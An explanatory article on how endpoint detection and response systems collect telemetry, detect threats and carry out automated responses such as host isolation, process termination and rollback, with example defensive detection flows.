How EDR Works: Sensors, Telemetry, Detection, and Response

# How EDR Works: Sensors, Telemetry, Detection, and Response

This article explains the pipeline from endpoint telemetry to detection to response, covering how EDR systems collect data, analyze threats, and execute automated responses.

## Endpoint Agent Telemetry

EDR agents deployed on endpoints continuously collect comprehensive telemetry across multiple data sources:

### Process Monitoring

- **Process creation/termination**: Full command line arguments, parent-child relationships

- **Process genealogy**: Complete execution chains and process trees

- **Memory analysis**: Runtime behavior, injection detection, loaded modules

- **Process privileges**: Elevation attempts, token manipulation

### File System Activity

- **File operations**: Create, read, write, delete, move, rename operations

- **File metadata**: Hashes (MD5, SHA1, SHA256), digital signatures, version info

- **Execution events**: Binary launches, DLL loads, script execution

- **Ransomware indicators**: Mass file encryption, extension changes

### Network Communications

- **Connection details**: Source/destination IPs, ports, protocols

- **DNS queries**: Domain resolutions, suspicious TLD patterns

- **Network flows**: Data volumes, connection durations, beacon analysis

- **Protocol analysis**: HTTP headers, HTTPS certificate inspection

### Registry Monitoring

- **Registry modifications**: Key creation, value changes, deletions

- **Persistence mechanisms**: Startup entries, service installations

- **System configuration**: Security settings modifications

- **Malware artifacts**: Common persistence and configuration entries

### User Behavior Analysis

- **Authentication events**: Logon/logoff, failed attempts, privilege escalation

- **User activity**: File access patterns, application usage

- **Lateral movement**: Network authentication, remote access attempts

- **Anomalous behavior**: Off-hours activity, unusual access patterns

## Analytics: Detections, Behavior, Rules, and Machine Learning

### Behavioral Analysis Engine

- **Baseline establishment**: Normal system and user behavior patterns

- **Anomaly detection**: Deviations from established baselines

- **Attack technique mapping**: MITRE ATT&CK framework correlation

- **Context correlation**: Multi-event analysis for complex attack chains

### Rule-Based Detection

- **Signature matching**: Known malware families and variants

- **YARA rules**: Pattern matching for malicious code structures

- **IOC matching**: Hash, IP, domain, and file path indicators

- **Behavioral rules**: Suspicious activity pattern detection

### Machine Learning Models

- **Supervised learning**: Trained on labeled malicious and benign samples

- **Unsupervised learning**: Identify previously unknown threats

- **Neural networks**: Deep learning for complex pattern recognition

- **Model updates**: Continuous learning from global threat intelligence

### Cloud Intelligence Integration

- **Threat intelligence feeds**: Real-time IOC updates from security vendors

- **Global visibility**: Cross-customer attack pattern analysis

- **Sandbox analysis**: Automated malware behavior analysis

- **Reputation services**: File, IP, and domain reputation scoring

## Response Actions: Isolate, Kill, Quarantine, and Rollback

### Network Isolation

- **Host containment**: Block all network communications except management traffic

- **Granular isolation**: Block specific processes or applications

- **Temporary quarantine**: Time-limited isolation with automatic release

- **Investigation preservation**: Maintain forensic access during isolation

### Process Termination

- **Malicious process killing**: Immediate termination of confirmed threats

- **Process tree termination**: Kill parent and all child processes

- **Service disruption**: Stop malicious services and scheduled tasks

- **Memory dumping**: Capture process memory before termination for analysis

### File Quarantine and Remediation

- **File quarantine**: Move suspicious files to secure storage

- **Hash-based blocking**: Prevent execution of known malicious files

- **Digital signature validation**: Block unsigned or suspicious binaries

- **Whitelist enforcement**: Allow only approved applications to execute

### System Rollback Capabilities

- **File system rollback**: Restore files to pre-infection state

- **Registry restoration**: Revert system configuration changes

- **Snapshot management**: Create and restore system snapshots

- **Backup validation**: Ensure rollback targets are clean

## Example Detection Flows

### Ransomware Detection and Response

1. **Initial indicators**: Mass file encryption detected

2. **Process analysis**: Identify ransomware executable and process tree

3. **Network blocking**: Isolate host to prevent lateral spread

4. **Process termination**: Kill ransomware processes immediately

5. **File recovery**: Initiate rollback of encrypted files from backup

6. **Threat analysis**: Extract IOCs and update detection rules

### Credential Theft Investigation

1. **Suspicious activity**: LSASS memory access detected

2. **Process investigation**: Analyze accessing process and parent chain

3. **User correlation**: Check for unusual authentication patterns

4. **Network analysis**: Monitor for lateral movement attempts

5. **Credential reset**: Force password changes for affected accounts

6. **Continuous monitoring**: Enhanced surveillance for compromised credentials

### Living-off-the-Land Attack

1. **PowerShell execution**: Encoded command line detected

2. **Behavioral analysis**: Unusual PowerShell usage pattern identified

3. **Command decoding**: Reveal malicious payload and intent

4. **Network correlation**: Check for command-and-control communications

5. **Response orchestration**: Block C2 domains, isolate host, kill processes

6. **Attribution**: Link to known threat actor TTPs and campaigns

## Data Retention and Forensic Value

### Data Storage Strategy

- **Hot storage**: Recent 30-90 days for real-time analysis

- **Warm storage**: 6-12 months for threat hunting and investigations

- **Cold storage**: Long-term retention for compliance and historical analysis

- **Data compression**: Efficient storage of large telemetry volumes

### Forensic Capabilities

- **Timeline reconstruction**: Chronological view of attack progression

- **Evidence preservation**: Immutable audit trails for legal proceedings

- **Chain of custody**: Documented evidence handling procedures

- **Expert witness support**: Technical testimony and report generation

### Search and Analysis Features

- **Full-text search**: Query across all collected telemetry

- **Time-based filtering**: Focus analysis on specific time windows

- **Cross-system correlation**: Link events across multiple endpoints

- **Threat hunting queries**: Proactive search for indicators of compromise

### Compliance and Reporting

- **Regulatory requirements**: Meet data retention mandates (GDPR, HIPAA, SOX)

- **Incident documentation**: Comprehensive breach response reports

- **Metrics and KPIs**: Dwell time, detection rates, response times

- **Executive dashboards**: High-level security posture visibility

## Integration with Security Ecosystem

### SIEM Integration

- **Log forwarding**: Stream EDR events to central SIEM platform

- **Alert enrichment**: Add endpoint context to security events

- **Correlation rules**: Cross-reference EDR data with other security tools

- **Automated workflows**: Trigger SOAR playbooks from EDR detections

### Threat Intelligence Platforms

- **IOC enrichment**: Add context to indicators from multiple sources

- **Attribution data**: Link attacks to known threat actors and campaigns

- **TTPs mapping**: Correlate observed techniques with MITRE ATT&CK

- **Predictive analysis**: Anticipate future attack vectors based on trends